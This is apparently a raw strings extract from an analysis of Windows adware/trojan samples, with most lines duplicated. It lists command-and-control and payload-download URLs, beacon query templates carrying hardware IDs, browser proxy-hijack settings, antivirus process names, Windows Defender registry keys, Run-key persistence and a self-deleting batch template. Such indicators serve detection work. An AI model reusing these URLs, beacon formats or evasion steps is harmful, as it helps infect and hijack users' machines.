%s</pre><pre>%s_5_%s</pre><pre>http=127.0.0.1:</pre><pre>prefs.js</pre><pre>Mozilla</pre><pre>"network.proxy.http"</pre><pre>"network.proxy.http_port"</pre><pre>"network.proxy.type"</pre><pre>"127.0.0.1"</pre><pre>%s(%s, %s);</pre><pre>operaprefs.ini</pre><pre>Opera</pre><pre>Use HTTP</pre><pre>HTTP server</pre><pre>127.0.0.1:%s</pre><pre>%s=%s</pre><pre>%s:%s</pre><pre>hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s</pre><pre>id=%s&hwid=%s</pre><pre>exec|%s</pre><pre>http=</pre><pre><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></pre><pre>bing.com</pre><pre>yahoo.com</pre><pre>search.aol.</pre><pre>suche.aol.</pre><pre>searcht2.aol.</pre><pre>.yimg.com</pre><pre>.bing.net</pre><pre>scorecardresearch.com</pre><pre>brightcove.com</pre><pre>.aol.</pre><pre>.atwola.</pre><pre>.ivwbox.</pre><pre>.google</pre><pre>.atdmt.</pre><pre>.abmr.</pre><pre>.tacoda.</pre><pre>.adtechus.</pre><pre>.autodatadirect.</pre><pre>.mapquestapi.</pre><pre>.ggpht.</pre><pre>.virtualearth.</pre><pre>.opera.</pre><pre>.microsoft.</pre><pre>.wsod.</pre><pre>.doubleclick.</pre><pre>.ypcdn.</pre><pre>.truveo.</pre><pre>.tlowdb.</pre><pre>mapq.st</pre><pre>.dartsearch.</pre><pre>.thawte.</pre><pre>http://</pre><pre>bing.com/search</pre><pre>search.yahoo.com/search</pre><pre>%s_1_%s</pre><pre>err%d%s_%d_%d</pre><pre>err0%s_%d_%d</pre><pre>ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d</pre><pre>%s:443/%s</pre><pre>%s_2_%s</pre><pre>%s_%s_%s</pre><pre>%s_3_%s</pre><pre>www.www.ru</pre><pre>https://</pre><pre>.doubleclick.net</pre><pre>doubleclick.net</pre><pre>msn.com</pre><pre>%s_0%d_%d</pre><pre>=='undefined'?'%s':'%s'
.referrer
.referrer
HTTP/1.0
HTTP/1.0
User-Agent: chrome/9.0
User-Agent: chrome/9.0
%s %s %s
%s %s %s
http://www.google.com/
http://www.google.com/
http://www.yahoo.com/
http://www.yahoo.com/
.class
.class
.midi
.midi
google_ad.url
google_ad.url
google_ad.title
google_ad.title
r.msn.com
r.msn.com
google_ad.line1
google_ad.line1
zcÁ
zcÁ
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
%Program Files%\C6249
%Program Files%\C6249
%Documents and Settings%\%current user%\Application Data\649C6
%Documents and Settings%\%current user%\Application Data\649C6
%Program Files%\LP\4566
%Program Files%\LP\4566
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
8888888
8888888
N ssh
N ssh
hssHe
hssHe
w:.WM
w:.WM
IPHLPAPI.DLL
IPHLPAPI.DLL
EnumChildWindows
EnumChildWindows
newdev.dll
newdev.dll
SHELL32.dll
SHELL32.dll
SETUPAPI.dll
SETUPAPI.dll
MPRAPI.dll
MPRAPI.dll
KERNEL32.dll
KERNEL32.dll
GetCPInfo
GetCPInfo
EY%Snkx
EY%Snkx
GetProcessHeap
GetProcessHeap
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegFlushKey
RegFlushKey
ShellExecuteA
ShellExecuteA
SHDeleteKeyA
SHDeleteKeyA
keybd_event
keybd_event
EnumWindows
EnumWindows
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpConnect
WinHttpConnect
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpReadData
WinHttpReadData
WinHttpOpen
WinHttpOpen
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PSAPI.DLL
PSAPI.DLL
RASAPI32.dll
RASAPI32.dll
RPCRT4.dll
RPCRT4.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WINHTTP.dll
WINHTTP.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
WUSER32.DLL
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
Dr.Web
mhttp=127.0.0.1:%d
mhttp=127.0.0.1:%d
http://www.yahoo.com
http://www.yahoo.com
2.0.2.1
2.0.2.1
3R2R.exe_1728_rwx_00400000_00068000:
`.rsrc
`.rsrc
PSSh$
PSSh$
SSShbU@
SSShbU@
SSj%S
SSj%S
<%u,V
<%u,V
<3%u1f
<3%u1f
GetProcessWindowStation
GetProcessWindowStation
operator
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
\sc.exe
ntdll.dll
ntdll.dll
iexplore.exe
iexplore.exe
opera.exe
opera.exe
firefox.exe
firefox.exe
safari.exe
safari.exe
chrome.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
AVGIDSAgent.exe
avgchsvx.exe
avgchsvx.exe
avgemcx.exe
avgemcx.exe
avgnsx.exe
avgnsx.exe
avgrsx.exe
avgrsx.exe
avgtray.exe
avgtray.exe
avgwdsvc.exe
avgwdsvc.exe
avgnt.exe
avgnt.exe
ccsvchst.exe
ccsvchst.exe
AvastUI.exe
AvastUI.exe
mcagent.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
explorer.exe
Windows Security Center
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
Windows Defender
at %d:%d "%s" %s
at %d:%d "%s" %s
win32iexplore.exe
win32iexplore.exe
win32opera.exe
win32opera.exe
win32firefox.exe
win32firefox.exe
win32safari.exe
win32safari.exe
win32winword.exe
win32winword.exe
win32excel.exe
win32excel.exe
win32outlook.exe
win32outlook.exe
win32photoshop.exe
win32photoshop.exe
win32wmplayer.exe
win32wmplayer.exe
win32java.exe
win32java.exe
win32itunes.exe
win32itunes.exe
win32msmsgs.exe
win32msmsgs.exe
java.exe
java.exe
*.log
*.log
%s:\windows\system32\%s.tmp
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
Find Temporary files is %d
cannot open files %s, Open next files ?
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s\%s
%s.%s
%s.%s
stor.cfg
stor.cfg
exec%s
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
Advapi32.dll
%s%s_1
%s%s_1
%s_0_%d_%s
%s_0_%d_%s
%s_%d
%s_%d
%s_%d_%d_%d_%d
%s_%d_%d_%d_%d
%s_%s
%s_%s
http://
http://
POST %s HTTP/1.1
POST %s HTTP/1.1
Host: %s
Host: %s
User-Agent: mozilla/2.0
User-Agent: mozilla/2.0
Content-Length: %u
Content-Length: %u
POST http://%s%s HTTP/1.1
POST http://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
%s?tq=%s
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111
%s_%s_%d
%s_%s_%d
_1_%d
_1_%d
_2_%d
_2_%d
_3_%d
_3_%d
_4_%d
_4_%d
http://worldorderlive.com
http://worldorderlive.com
http://rumperstumprs.com
http://rumperstumprs.com
http://transaerosystems.com
http://transaerosystems.com
http://freeridershools.com
http://freeridershools.com
http://ourbigdrophills.com
http://ourbigdrophills.com
http://mydbonlineaccess.com
http://mydbonlineaccess.com
http://onlinepdahelpforyou.com
http://onlinepdahelpforyou.com
http://remarkreddomas.com
http://remarkreddomas.com
http://transfersakkonline.com
http://transfersakkonline.com
http://backupdomaintolevel.com
http://backupdomaintolevel.com
SELECT_RESERV_SRV_%d
SELECT_RESERV_SRV_%d
%s_%d_%s
%s_%d_%s
id=%s&c=%d
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d_%d
%s_%d_%d
%s_%d_%d
%s %s
%s %s
%s start%s%c%s
%s start%s%c%s
c1.exe
c1.exe
c2.exe
c2.exe
c3.exe
c3.exe
DWN_CON_STRP_%d_%s
DWN_CON_STRP_%d_%s
http://%d.ctrl.%s
http://%d.ctrl.%s
logo.png
logo.png
img/135.png
img/135.png
img/136.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
http://armoredlegion.com/305986.png
http://armoredlegion.com/305986.png
http://armoredlegion.com/16354.png
http://armoredlegion.com/16354.png
http://armoredlegion.com/716354_m61.png
http://armoredlegion.com/716354_m61.png
http://mektek.net/thelab/wiley.jpg
http://mektek.net/thelab/wiley.jpg
http://knowledgesutra.com/img/temp/hi.cgi
http://knowledgesutra.com/img/temp/hi.cgi
http://knowledgesutra.com/img/temp/head.png
http://knowledgesutra.com/img/temp/head.png
http://battleon.com/134.gif
http://battleon.com/134.gif
http://battleon.com/132.gif
http://battleon.com/132.gif
http://battleon.com/133.gif
http://battleon.com/133.gif
http://browsermmorpg.com/images/cpc.png
http://browsermmorpg.com/images/cpc.png
http://browsermmorpg.com/images/cpc2.png
http://browsermmorpg.com/images/cpc2.png
http://browsermmorpg.com/img/intel.gif
http://browsermmorpg.com/img/intel.gif
http://browsermmorpg.com/img/intel.jpg
http://browsermmorpg.com/img/intel.jpg
http://012webpages.com/christian12.jpg
http://012webpages.com/christian12.jpg
http://012webpages.com/christian13.jpg
http://012webpages.com/christian13.jpg
http://012webpages.com/christian14.jpg
http://012webpages.com/christian14.jpg
http://tri-countymech.com/g/livechat.png
http://tri-countymech.com/g/livechat.png
http://tri-countymech.com/g/logo.png
http://tri-countymech.com/g/logo.png
http://tri-countymech.com/g/133.jpg
http://tri-countymech.com/g/133.jpg
http://tri-countymech.com/g/134.jpg
http://tri-countymech.com/g/134.jpg
http://electronicstheory.com/pics/valley.png
http://electronicstheory.com/pics/valley.png
http://electronicstheory.com/pics/sun.png
http://electronicstheory.com/pics/sun.png
http://classicbattletech.com/lhous3.gif
http://classicbattletech.com/lhous3.gif
http://classicbattletech.com/lhous4.gif
http://classicbattletech.com/lhous4.gif
http://classicbattletech.com/lhous5.gif
http://classicbattletech.com/lhous5.gif
http://classicbattletech.com/lhous6.gif
http://classicbattletech.com/lhous6.gif
http://engineeringcrossing.com/images/misc/23525.png
http://engineeringcrossing.com/images/misc/23525.png
http://engineeringcrossing.com/images/misc/64646.png
http://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
t=ip&hrs=%d&q=&s=1
%s?pr=%s
%s?pr=%s
\bl%d_64.bat
\bl%d_64.bat
del "%s"
del "%s"
if exist "%s" goto a
if exist "%s" goto a
cmd.exe /c "%s"
cmd.exe /c "%s"
%s.zl
%s.zl
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
GET %s HTTP/1.0
GET %s HTTP/1.0
http://xprstats.com/images/logo.png
http://xprstats.com/images/logo.png
drweb
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
t=ml&q=%s
xprstats.com
xprstats.com
http://%s%s
http://%s%s
ldr.ini
ldr.ini
reportfrommains.com
reportfrommains.com
http://%s/s.php?c=121&id=%s
http://%s/s.php?c=121&id=%s
onlinereportsystem.com
onlinereportsystem.com
%s_1_%d_%s
%s_1_%d_%s
%s_2_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_3_%d_%s
%s_4_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
pmv=2&id=%s&hwid=%s
u.exe
u.exe
%s up%s
%s up%s
&%s=%s
&%s=%s
PRM_LSTN_THIS_PORT
PRM_LSTN_THIS_PORT
127.0.0.1
127.0.0.1
HTTP/1.x
HTTP/1.x
google.com
google.com
http://www.google.com
http://www.google.com
HTTP/1.1 302 Found
HTTP/1.1 302 Found
Location: %s
Location: %s
id=%s&type=%d&ppcid=%s
id=%s&type=%d&ppcid=%s
%s: %s
%s: %s
%s_5_%s
%s_5_%s
http=127.0.0.1:
http=127.0.0.1:
prefs.js
prefs.js
Mozilla
Mozilla
"network.proxy.http"
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.http_port"
"network.proxy.type"
"network.proxy.type"
"127.0.0.1"
"127.0.0.1"
%s(%s, %s);
%s(%s, %s);
operaprefs.ini
operaprefs.ini
Opera
Opera
Use HTTP
Use HTTP
HTTP server
HTTP server
127.0.0.1:%s
127.0.0.1:%s
%s=%s
%s=%s
%s:%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
id=%s&hwid=%s
exec|%s
exec|%s
http=
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
bing.com
yahoo.com
yahoo.com
search.aol.
search.aol.
suche.aol.
suche.aol.
searcht2.aol.
searcht2.aol.
.yimg.com
.yimg.com
.bing.net
.bing.net
scorecardresearch.com
scorecardresearch.com
brightcove.com
brightcove.com
.aol.
.aol.
.atwola.
.atwola.
.ivwbox.
.ivwbox.
.atdmt.
.atdmt.
.abmr.
.abmr.
.tacoda.
.tacoda.
.adtechus.
.adtechus.
.autodatadirect.
.autodatadirect.
.mapquestapi.
.mapquestapi.
.ggpht.
.ggpht.
.virtualearth.
.virtualearth.
.opera.
.opera.
.microsoft.
.microsoft.
.wsod.
.wsod.
.doubleclick.
.doubleclick.
.ypcdn.
.ypcdn.
.truveo.
.truveo.
.tlowdb.
.tlowdb.
mapq.st
mapq.st
.dartsearch.
.dartsearch.
.thawte.
.thawte.
http://
http://
bing.com/search
bing.com/search
search.yahoo.com/search
search.yahoo.com/search
%s_1_%s
%s_1_%s
err%d%s_%d_%d
err%d%s_%d_%d
err0%s_%d_%d
err0%s_%d_%d
ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s:443/%s
%s_2_%s
%s_2_%s
%s_%s_%s
%s_%s_%s
%s_3_%s
%s_3_%s
www.www.ru
www.www.ru
https://
https://
.doubleclick.net
.doubleclick.net
doubleclick.net
doubleclick.net
msn.com
msn.com
%s_0%d_%d
%s_0%d_%d
=='undefined'?'%s':'%s'
=='undefined'?'%s':'%s'
.referrer
.referrer
HTTP/1.0
HTTP/1.0
User-Agent: chrome/9.0
User-Agent: chrome/9.0
%s %s %s
%s %s %s
http://www.google.com/
http://www.google.com/
http://www.yahoo.com/
http://www.yahoo.com/
.class
.class
.midi
.midi
google_ad.url
google_ad.url
google_ad.title
google_ad.title
r.msn.com
r.msn.com
google_ad.line1
google_ad.line1
zcÁ
zcÁ
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
%Program Files%\C6249
%Program Files%\C6249
%Documents and Settings%\%current user%\Application Data\649C6
%Documents and Settings%\%current user%\Application Data\649C6
%Program Files%\LP\4566
%Program Files%\LP\4566
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
8888888
8888888
N ssh
N ssh
hssHe
hssHe
w:.WM
w:.WM
IPHLPAPI.DLL
IPHLPAPI.DLL
EnumChildWindows
EnumChildWindows
newdev.dll
newdev.dll
SHELL32.dll
SHELL32.dll
SETUPAPI.dll
SETUPAPI.dll
MPRAPI.dll
MPRAPI.dll
KERNEL32.dll
KERNEL32.dll
GetCPInfo
GetCPInfo
EY%Snkx
EY%Snkx
GetProcessHeap
GetProcessHeap
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegFlushKey
RegFlushKey
ShellExecuteA
ShellExecuteA
SHDeleteKeyA
SHDeleteKeyA
keybd_event
keybd_event
EnumWindows
EnumWindows
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpConnect
WinHttpConnect
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpReadData
WinHttpReadData
WinHttpOpen
WinHttpOpen
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PSAPI.DLL
PSAPI.DLL
RASAPI32.dll
RASAPI32.dll
RPCRT4.dll
RPCRT4.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WINHTTP.dll
WINHTTP.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
WUSER32.DLL
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
Dr.Web
mhttp=127.0.0.1:%d
mhttp=127.0.0.1:%d
http://www.yahoo.com
http://www.yahoo.com
2.0.2.1
2.0.2.1
Explorer.EXE_1644_rwx_01370000_0000A000:
&ew%.YY
&ew%.YY
ver76%sdhpj
ver76%sdhpj
SafariChromeFi~
SafariChromeFi~
PSShx47
PSShx47
.exeu]
.exeu]
%sdhpjelxr.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d
%sdhpjelxr.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d
Chrome
Chrome
Firefox
Firefox
Opera
Opera
%sgkih.exe
%sgkih.exe
%subsnltn.php?adv=adv401&id=%d&c=%d
%subsnltn.php?adv=adv401&id=%d&c=%d
%sdesk.exe
%sdesk.exe
%sjnupkvq.php?adv=adv401&id=%d&c=%d
%sjnupkvq.php?adv=adv401&id=%d&c=%d
%splmnimmi.exe
%splmnimmi.exe
%srvdojqpje.php?adv=adv401&id=%d&c=%d
%srvdojqpje.php?adv=adv401&id=%d&c=%d
%snkamk.exe
%snkamk.exe
%sevpxez.php?adv=adv401&id=%d&c=%d
%sevpxez.php?adv=adv401&id=%d&c=%d
%sgywaume.exe
%sgywaume.exe
%simgbidoje.php?adv=adv401&id=%d&c=%d
%simgbidoje.php?adv=adv401&id=%d&c=%d
%snildxk.exe
%snildxk.exe
%sarzgbzhf.php?adv=adv401&id=%d&c=%d
%sarzgbzhf.php?adv=adv401&id=%d&c=%d
%ssqpvrlh.exe
%ssqpvrlh.exe
%sizucahpkip.php?adv=adv401&id=%d&c=%d
%sizucahpkip.php?adv=adv401&id=%d&c=%d
%scmameeao.exe
%scmameeao.exe
%snvmkfmhfa.php?adv=adv401&id=%d&c=%d
%snvmkfmhfa.php?adv=adv401&id=%d&c=%d
%smuis.exe
%smuis.exe
%sjwezxfzk.php?adv=adv401&id=%d&c=%d
%sjwezxfzk.php?adv=adv401&id=%d&c=%d
%sdsdfca.exe
%sdsdfca.exe
%swqtkipkiqk.php?adv=adv401&id=%d&c=%d
%swqtkipkiqk.php?adv=adv401&id=%d&c=%d
%suxwdet.exe
%suxwdet.exe
%szdlfahcaip.php?adv=adv401&id=%d&c=%d
%szdlfahcaip.php?adv=adv401&id=%d&c=%d
%sctbidkjq.php?adv=adv401&id=%d&c=%d
%sctbidkjq.php?adv=adv401&id=%d&c=%d
http://bascheme.com/dpxezto/
http://bascheme.com/dpxezto/
http://aahacker.com/dpxezto/
http://aahacker.com/dpxezto/
psapi.dll
psapi.dll
ddraw.dll
ddraw.dll
urlmon.dll
urlmon.dll
shell32.dll
shell32.dll
kernel32.dll
kernel32.dll
user32.dll
user32.dll
wininet.dll
wininet.dll
ntdll.dll
ntdll.dll
\svchost.exe
\svchost.exe
explorer.exe
explorer.exe
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\2 Gansta.exe
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\2 Gansta.exe
ShellExecuteExA
ShellExecuteExA
InternetOpenUrlA
InternetOpenUrlA
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
DDRAW.dll
DDRAW.dll
PSAPI.DLL
PSAPI.DLL
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll